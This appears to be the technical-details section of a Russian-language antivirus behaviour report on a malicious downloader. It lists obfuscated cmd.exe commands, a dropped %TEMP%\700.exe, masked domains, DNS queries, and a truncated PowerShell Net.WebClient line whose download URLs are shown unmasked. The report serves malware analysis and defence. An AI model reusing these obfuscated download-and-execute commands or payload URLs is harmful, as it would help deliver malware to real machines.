Техническая информация
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set k8=5N{;@lN'donzOxwM^>f}foL:'u1?=H@,rRr$Pl%\nNi9$gD+}ID6}*X@{b_'h)7zcV)~ta42a5CRcCGJ}1'`}n_0;s+^&k5vda3o4egx#rLE'buF};D^<0'TS.CWmhcI)`Z?0}'+\4...
- %TEMP%\700.exe
- %TEMP%\700.exe
- 'ba####onsulting.com':80
- 'al####irmccoy.co.uk':80
- 'ha##ore.in':80
- '4t###eb.co.uk':80
- 'za#####edomki.com.pl':80
- http://ba####onsulting.com/PlKd
- http://al####irmccoy.co.uk/2szNjQzX
- http://ha##ore.in/UXxra
- http://4t###eb.co.uk/_-hacked/7M
- http://za#####edomki.com.pl/wt9
- http://www.za#####edomki.com.pl/wt9
- DNS ASK ba####onsulting.com
- DNS ASK al####irmccoy.co.uk
- DNS ASK ha##ore.in
- DNS ASK 4t###eb.co.uk
- DNS ASK za#####edomki.com.pl
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set k8=5N{;@lN'donzOxwM^>f}foL:'u1?=H@,rRr$Pl%\nNi9$gD+}ID6}*X@{b_'h)7zcV)~ta42a5CRcCGJ}1'`}n_0;s+^&k5vda3o4egx#rLE'buF};D^<0'TS.CWmhcI)`Z?0}'+\4...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /V:ON/C"set k8=5N{;@lN'donzOxwM^>f}foL:'u1?=H@,rRr$Pl%/nNi9$gD+}ID6}*X@{b_'h)7zcV)~ta42a5CRcCGJ}1'`}n_0;s+^&k5vda3o4egx#rLE'buF};D^<0'TS.CWmhcI)`Z?0}'+/4=h^<Sd{sPJnjujZ[-$gZ[;2~XOIqwXMGok5GJ$O3...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo $nCw='Icm';$fKY=new-object Net.WebClient;$fOm='http://baatzconsulting.com/PlKd@http://alistairmccoy.co.uk/2szNjQzX@http://havmore.in/UXxra@http://4theweb.co.uk/_-hacked/7M@http:/...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -